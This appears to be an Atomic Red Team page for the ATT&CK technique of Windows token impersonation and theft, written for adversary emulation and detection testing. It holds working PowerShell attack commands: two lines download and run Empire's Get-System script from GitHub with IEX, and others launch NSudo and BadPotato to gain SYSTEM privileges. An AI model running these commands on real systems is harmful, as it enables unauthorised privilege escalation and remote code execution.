Try it using Invoke-Atomic

Access Token Manipulation: Token Impersonation/Theft

Description from ATT&CK

Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using

1
DuplicateToken
or
1
DuplicateTokenEx
. The token can then be used with
1
ImpersonateLoggedOnUser
to allow the calling thread to impersonate a logged on user's security context, or with
1
SetThreadToken
to assign the impersonated token to a thread.

An adversary may perform Token Impersonation/Theft when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system.

When an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally Create Process with Token using

1
CreateProcessWithTokenW
or
1
CreateProcessAsUserW
. Token Impersonation/Theft is also distinct from Make and Impersonate Token in that it refers to duplicating an existing token, rather than creating a new one.

Atomic Tests

Atomic Test #1 - Named pipe client impersonation

Uses PowerShell and Empire's GetSystem module. The script creates a named pipe, and a service that writes to that named pipe. When the service connects to the named pipe, the script impersonates its security context. When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM).

Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/

Supported Platforms: windows

auto_generated_guid: 90db9e27-8e7c-4c04-b602-a45927884966

Inputs:

None

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
2
3
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose

Atomic Test #2 -
1
SeDebugPrivilege
token duplication

Uses PowerShell and Empire's GetSystem module. The script uses

1
SeDebugPrivilege
to obtain, duplicate and impersonate the token of a another process. When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM).

Supported Platforms: windows

auto_generated_guid: 34f0a430-9d04-4d98-bcb5-1989f14719f0

Inputs:

None

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
2
3
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose

Atomic Test #3 - Launch NSudo Executable

Launches the NSudo executable for a short period of time and then exits. NSudo download observed after maldoc execution. NSudo is a system management tool for advanced users to launch programs with full privileges.

Supported Platforms: windows

auto_generated_guid: 7be1bc0f-d8e5-4345-9333-f5f67d742cb9

Inputs:

Name Description Type Default Value
nsudo_path Path to the NSudo bat file path $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher\x64\NSudoLG.exe

Attack Commands: Run with powershell!

1
2
3
4
Start-Process #{nsudo_path} -Argument "-U:T -P:E cmd"
Start-Sleep -Second 5
Stop-Process -Name "cmd" -force -erroraction silentlycontinue

Dependencies: Run with powershell!

Description: NSudo.bat must exist in the specified path #{nsudo_path}

Check Prereq Commands:

1
2
if (Test-Path #{nsudo_path}) {exit 0} else {exit 1}

Get Prereq Commands:

1
2
3
4
5
Invoke-WebRequest -OutFile $env:TEMP\NSudo_8.2_All_Components.zip "https://github.com/M2Team/NSudo/releases/download/8.2/NSudo_8.2_All_Components.zip"
Expand-Archive -Path $env:TEMP\NSudo_8.2_All_Components.zip -DestinationPath $env:TEMP\NSudo_8.2_All_Components -Force
Rename-Item "$env:TEMP\NSudo_8.2_All_Components\NSudo Launcher" $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher
Remove-Item $env:TEMP\NSudo_8.2_All_Components.zip -Recurse -ErrorAction Ignore

Atomic Test #4 - Bad Potato

https://github.com/BeichenDream/BadPotato Privilege escalation using named pipe connections

Supported Platforms: windows

auto_generated_guid: 9c6d799b-c111-4749-a42f-ec2f8cb51448

Inputs:

None

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
2
3
4
5
6
cd $env:temp
Start-Process .\BadPotato.exe notepad.exe
Start-Sleep -Second 20
Stop-Process -Name "notepad" -force -erroraction silentlycontinue
Stop-Process -Name "BadPotato" -force -erroraction silentlycontinue

Cleanup Commands:

1
2
taskkill /f /im notepad.exe

Dependencies: Run with powershell!

Description: BadPotato.exe must exist in the temp directory

Check Prereq Commands:

1
2
if (Test-Path $env:temp\BadPotato.exe) {exit 0} else {exit 1}

Get Prereq Commands:

1
2
Invoke-WebRequest -OutFile $env:TEMP\BadPotato.exe "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/bin/BadPotato.exe?raw=true"

source